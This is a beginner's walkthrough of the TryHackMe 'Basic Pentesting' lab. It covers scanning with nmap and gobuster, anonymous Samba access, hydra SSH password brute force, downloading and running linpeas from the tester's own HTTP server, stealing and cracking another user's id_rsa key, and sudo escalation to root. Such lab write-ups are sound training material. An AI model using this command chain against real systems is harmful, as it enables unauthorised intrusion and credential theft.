This writeup is the first in my TryHackME writeup series. I've carefully been dipping my toes into pentesting lately and love to keep notes so I figured I'd write them out.
This is a writeup for Basic Pentesting
nb: I'm going to assume you're running Kali Linux and you're working from an empty folder you made for this room.
Let's take a look at this room. We're going to deploy the server and connect using OpenVPN. For more info on how to do that, visit the OpenVPN room. We'll skill all questions that don't need an answer.
In order to figure out which services are running on the server we've been given, we're going to run nmap. It's going to be useful to scan with our default safe scripts, so our command will look a little like this:
nmap -sV -sC <ip>
We might need this information later, so let's make sure we save it somewhere. I like to put all my scans in a single directory in my work folder, so let's
mkdir scans and then output our nmap scan to a file in that folder:
nmap -sV -sC -oN scans/nmap <ip>
Visiting the IP we've been given in our browser, we can see that it's running an Apache server, so it's going to be worth looking around to see which folders live on this server. It just so happens we'll need that information for question #3 as well. To find hidden folders, we're going to be running
gobuster. A simple
dir scan with
gobuster should be enough to get the information we need to get going. We're going to be using the
2.3-medium wordlist from
dirbuster for this, which should already be on your Kali install.
gobuster dir \ -u http://<ip>/ \ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \ -o scans/gobuster
If we let our
gobuster run for a while, we'll find our hidden directory. Let's fill that in and take a look in the folder. There are two files there. One of them mentions that a user referred to as "J" has a weak password. Let's make sure we remember that! Let's save both of these files for later reference.
We're told to brute force for a username and password. I don't like brute forcing for usernames, it feels inefficient. Of course we already know we have two people who use this server, so we could just guess names. That too is inefficient, so let's do a little more digging.
If we open our
nmap scan, we can see that
Samba is running on this server. Let's go see if we can connect to the
Samba server as an anonymous user.
Sure enough, we're connected! Now we just need to find out what's in this folder, if anything. When run a quick
ls, we can see that there's a
staff.txt file. Let's
get staff.txt and see what's in it!
smb connection, we can take a look at the
Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!) -Kay
Great, we now know that the two users we are going to try to hack are called
Kay. If we think back to what we found in that hidden directory, we can assume that
Jan has a weak password. Let's see if he is in fact the user we're looking for in question 5 and start cracking his password.
Cracking this weak password is going to easy. We'll be using
hydra to do all the work for us, and we'll use the
rockyou.txt wordlist. There is an entire room to learn about hydra so we'll skip teaching you that and just run the command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt <IP> ssh
This might take a couple minutes, so sit back and let
hydra do the work for you. After a while,
hydra will come back with a password we can use to connect to the server with SSH.
Once connected, we'll want to escalate our privileges on this server so we can access anything we want to. We kind of already know who the other user of this server is, but let's check the
/etc/passwd file to make sure!
Among the users listed there, we'll find the answer to question 9. Let's see if we can escalate our privileges to get access to that user.
I tend to use
linpeas to look for ways to escalate my privileges on a server, so we're going to do the same. Not because it's necessary on this server, but because it's really useful to learn how to do.
First, we're going to want to be in the
/var/tmp folder, where we have write access so run
Then we'll need to somehow download the
linpeas.sh file onto the server. Make sure you download a copy to your own computer first from The Github repo and put it in your project folder. From there, we'll setup a simple HTTP server with Python. Simply run
python -m SimpleHTTPServer in your project directory and you'll have a webserver running on
From the server, we're going to now download the
linpeas.sh file and run it to find possible privilege escalation methods that will work on this server. So let's run
wget http://<YOUR OWN IP>:8000/linpeas.sh which downloads the file, and then
chmod +x linpeas.sh to make the file executable. Now run
./linpeas.sh and see what it comes up with.
Looking through the
linpeas results, we can see that the other user has an
.ssh folder with an
id_rsa key in there. We might be able to use that so let's make sure we grab that file and put it on our own computer. We'll just
cat /home/<other_user>/.ssh/id_rsa, copy all of that and put it in an
id_rsa file in our project directory. Because we want to be able to use it to connect to a server, we need to set the proper rights for that file. So run
chmod 600 id_rsa and then try to connect to the server using
ssh -i id_rsa <other_user>@<IP>
Oh. A passphrase. We have yet to find that, but that's okay. Maybe we can just crack the
id_rsa file to find the
passphrase. Let's use
John the Ripper for this. First, we need to turn this
id_rsa file into something
John can crack. Let's run
/usr/share/john/ssh2john.py id_rsa crack to put the crack-able information in the
From there, we're going to crack this file with
John the Ripper, using the
rockyou.txt wordlist again. I won't go into the specifics for
John the Ripper as there are plenty resources out there for that. Here's the command we're going to run:
john crack --wordlist=/usr/share/wordlists/rockyou.txt
This almost instantly comes back with our passphrase, which we can now use to connect to our server. We run our ssh command again, and now we fill in the passphrase we got from
ssh -i id_rsa <other_user>@<IP>
We're in! When we take a look at the files in our home folder, we see that there's a file called
pass.bak. That's convenient! Let's open it using
cat and fill in the answer to question 11!
As a little bonus, we can check what kind of access we have. Maybe we just want to be
root at this point. Running
sudo -l shows us we have access to all commands as root. Well that's easy, let's make ourselves root then!
There we go. Now we're
root. There's a little surprise waiting for you in
/root/root.txt so go check that out!